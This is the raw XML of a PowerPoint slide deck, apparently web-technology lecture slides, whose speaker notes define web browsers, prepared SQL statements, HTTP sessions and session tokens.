
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="792" r:id="rId3"/>
    <p:sldId id="798" r:id="rId4"/>
    <p:sldId id="799" r:id="rId5"/>
    <p:sldId id="803" r:id="rId6"/>
    <p:sldId id="804" r:id="rId7"/>
    <p:sldId id="806" r:id="rId8"/>
    <p:sldId id="805" r:id="rId9"/>
    <p:sldId id="807" r:id="rId10"/>
    <p:sldId id="809" r:id="rId11"/>
    <p:sldId id="808" r:id="rId12"/>
    <p:sldId id="810" r:id="rId13"/>
    <p:sldId id="811" r:id="rId14"/>
    <p:sldId id="812" r:id="rId15"/>
    <p:sldId id="813" r:id="rId16"/>
    <p:sldId id="814" r:id="rId17"/>
    <p:sldId id="815" r:id="rId18"/>
    <p:sldId id="816" r:id="rId19"/>
    <p:sldId id="817" r:id="rId20"/>
    <p:sldId id="801" r:id="rId21"/>
    <p:sldId id="802" r:id="rId22"/>
    <p:sldId id="818" r:id="rId23"/>
    <p:sldId id="819" r:id="rId24"/>
    <p:sldId id="820" r:id="rId25"/>
    <p:sldId id="821" r:id="rId26"/>
    <p:sldId id="823" r:id="rId27"/>
    <p:sldId id="824" r:id="rId28"/>
    <p:sldId id="267" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="269" r:id="rId31"/>
    <p:sldId id="270" r:id="rId32"/>
    <p:sldId id="825" r:id="rId33"/>
    <p:sldId id="826" r:id="rId34"/>
    <p:sldId id="827" r:id="rId35"/>
    <p:sldId id="828" r:id="rId36"/>
    <p:sldId id="829" r:id="rId37"/>
    <p:sldId id="830" r:id="rId38"/>
    <p:sldId id="833" r:id="rId39"/>
    <p:sldId id="831" r:id="rId40"/>
    <p:sldId id="832" r:id="rId41"/>
    <p:sldId id="836" r:id="rId42"/>
    <p:sldId id="835" r:id="rId43"/>
    <p:sldId id="834" r:id="rId44"/>
    <p:sldId id="837" r:id="rId45"/>
    <p:sldId id="838" r:id="rId46"/>
    <p:sldId id="839" r:id="rId47"/>
    <p:sldId id="840" r:id="rId48"/>
    <p:sldId id="843" r:id="rId49"/>
    <p:sldId id="841" r:id="rId50"/>
    <p:sldId id="844" r:id="rId51"/>
    <p:sldId id="822" r:id="rId52"/>
    <p:sldId id="845" r:id="rId53"/>
    <p:sldId id="846" r:id="rId54"/>
    <p:sldId id="847" r:id="rId55"/>
    <p:sldId id="848" r:id="rId56"/>
    <p:sldId id="849" r:id="rId57"/>
    <p:sldId id="850" r:id="rId58"/>
    <p:sldId id="851" r:id="rId59"/>
    <p:sldId id="854" r:id="rId60"/>
    <p:sldId id="855" r:id="rId61"/>
    <p:sldId id="856" r:id="rId62"/>
    <p:sldId id="857" r:id="rId63"/>
    <p:sldId id="858" r:id="rId64"/>
    <p:sldId id="859" r:id="rId65"/>
    <p:sldId id="861" r:id="rId66"/>
    <p:sldId id="862" r:id="rId67"/>
    <p:sldId id="860" r:id="rId68"/>
    <p:sldId id="865" r:id="rId69"/>
    <p:sldId id="864" r:id="rId70"/>
    <p:sldId id="866" r:id="rId71"/>
    <p:sldId id="863" r:id="rId72"/>
    <p:sldId id="867" r:id="rId73"/>
    <p:sldId id="869" r:id="rId74"/>
    <p:sldId id="871" r:id="rId75"/>
    <p:sldId id="872" r:id="rId76"/>
    <p:sldId id="264" r:id="rId77"/>
    <p:sldId id="265" r:id="rId78"/>
    <p:sldId id="266" r:id="rId79"/>
    <p:sldId id="875" r:id="rId80"/>
    <p:sldId id="876" r:id="rId81"/>
    <p:sldId id="877" r:id="rId82"/>
    <p:sldId id="878" r:id="rId83"/>
    <p:sldId id="271" r:id="rId84"/>
    <p:sldId id="272" r:id="rId85"/>
    <p:sldId id="880" r:id="rId86"/>
    <p:sldId id="879" r:id="rId87"/>
    <p:sldId id="883" r:id="rId88"/>
    <p:sldId id="873" r:id="rId89"/>
    <p:sldId id="280" r:id="rId90"/>
    <p:sldId id="281" r:id="rId91"/>
    <p:sldId id="282" r:id="rId92"/>
    <p:sldId id="283" r:id="rId93"/>
    <p:sldId id="284" r:id="rId94"/>
    <p:sldId id="285" r:id="rId95"/>
    <p:sldId id="286" r:id="rId96"/>
    <p:sldId id="287" r:id="rId97"/>
    <p:sldId id="881" r:id="rId98"/>
    <p:sldId id="882" r:id="rId99"/>
    <p:sldId id="874" r:id="rId100"/>
    <p:sldId id="884" r:id="rId101"/>
    <p:sldId id="885" r:id="rId102"/>
    <p:sldId id="886" r:id="rId103"/>
    <p:sldId id="887" r:id="rId104"/>
    <p:sldId id="888" r:id="rId105"/>
    <p:sldId id="742" r:id="rId106"/>
    <p:sldId id="386" r:id="rId107"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTex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Office User"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CAF9ED-07DC-4A11-8D7F-57B35C25682E}" styleName="中度样式 1 - 强调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988" autoAdjust="0"/>
    <p:restoredTop sz="85882" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="504" y="176"/>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theme" Target="theme/theme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tableStyles" Target="tableStyle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notesMaster" Target="notesMasters/notesMaster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commentAuthors" Target="commentAuthor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9810" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92FD1BD-F49A-EC40-B2C6-50B5F6F33DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D67509-113B-6F43-9AA6-69C452359C8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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atin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC58884-C20E-594C-B097-918928D1B764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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9813" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D72641F-B348-024E-83C0-E53F1ECB7973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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119814" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15053D0A-745B-8040-99AB-2AEF73E6BB3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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atin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119815" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92FE752-FAB7-CB4D-9DF9-F9218301DDBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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3BE95568-ADD2-B141-BF62-DD057E3B3DEA}"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Arial"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Arial"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Arial"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Arial"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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4540E012-E62C-3041-910D-EF02B54367C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2DD32032-FC4C-674D-BE5A-13D4E315B74F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91D39520-0872-BE41-9480-8590A2F622DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306EDAA9-F6A0-4845-A547-B9F44231142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zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204"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7" name="幻灯片图像占位符 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECE44E43-57E8-474D-BA79-7088B2693085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157698" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AD551C-0FEE-9040-BFAF-089DCA3C9EB8}"/>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Run your own race.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B804610-5076-8144-827A-0A6E8B5535CE}"/>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2EF4AF90-F2E0-1044-A757-3A816EE3A9F9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35025977-A296-FE47-89E6-66F220843A6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61F3AF30-5310-7740-8418-C81C041D8B41}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8B7103-A567-6048-B09A-F70408DD71A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6531740-2C4C-E74B-95BE-021AFA7C4D6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zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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a:t>A web browser (also referred to as an Internet browser or simply a browser) is application software for accessing the World Wide Web or a local website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13571696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endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28747910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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32681156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Prepared Statement: It is an optimized feature that provides improved performance if the same or similar SQL statement needs to be executed repeatedly. Using prepared statements, we send an SQL statement template to the database, with certain values called parameters left unspecified. The database parses, compiles and performs query optimization on the SQL statement template and stores the result without executing it. We later bind data to the prepared statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38288532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Prepared Statement: It is an optimized feature that provides improved performance if the same or similar SQL statement needs to be executed repeatedly. Using prepared statements, we send an SQL statement template to the database, with certain values called parameters left unspecified. The database parses, compiles and performs query optimization on the SQL statement template and stores the result without executing it. We later bind data to the prepared statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30266629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Prepared Statement: It is an optimized feature that provides improved performance if the same or similar SQL statement needs to be executed repeatedly. Using prepared statements, we send an SQL statement template to the database, with certain values called parameters left unspecified. The database parses, compiles and performs query optimization on the SQL statement template and stores the result without executing it. We later bind data to the prepared statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915636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HTTP session is a sequence of network request-response transactions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A session token is a unique identifier that is generated and sent from a server to a client to identify the current interaction session.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3BE95568-ADD2-B141-BF62-DD057E3B3DEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36721425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Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E9B363-1E9E-4548-9774-1FC598017186}"/>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63E83B90-201D-784D-B1AA-0C3C57BB475E}"/>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DB9BEFF4-F4D0-AA40-B7E7-224DF468CF03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{76BFE8C0-FE9A-264F-AAE8-754036CF42F8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40768414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F9FF20A5-CA86-A042-92A6-93B85A968650}"/>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D3FF6684-7503-C14E-BA58-B13139A63EBB}"/>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8BCED2D3-18CB-1943-9295-957D5B9E33F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{16070A88-20B7-3B44-B509-B997C4633851}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15564591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58000" y="274638"/>
            <a:ext cx="2286000" cy="6583362"/>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0" y="274638"/>
            <a:ext cx="6705600" cy="6583362"/>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90419D88-37C5-E949-A71D-ECEBFD8641FD}"/>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E77DEA08-E42A-9B45-95FA-332B806989C0}"/>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62E2E9C4-12F0-704F-B8E8-5D4D13E56469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E3553F81-8CA8-5541-85A6-71D8E1A765EE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18401336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0" y="274638"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="表格占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4876E368-87CC-874F-9A99-37056A7B9C02}"/>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065695A5-FAAC-024F-8C55-6D5AB7666BD3}"/>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E2F9BB4A-C3F1-624F-9A58-9BC54D8753A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{65D4C6FF-12E3-D043-A40C-695F93051AC7}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
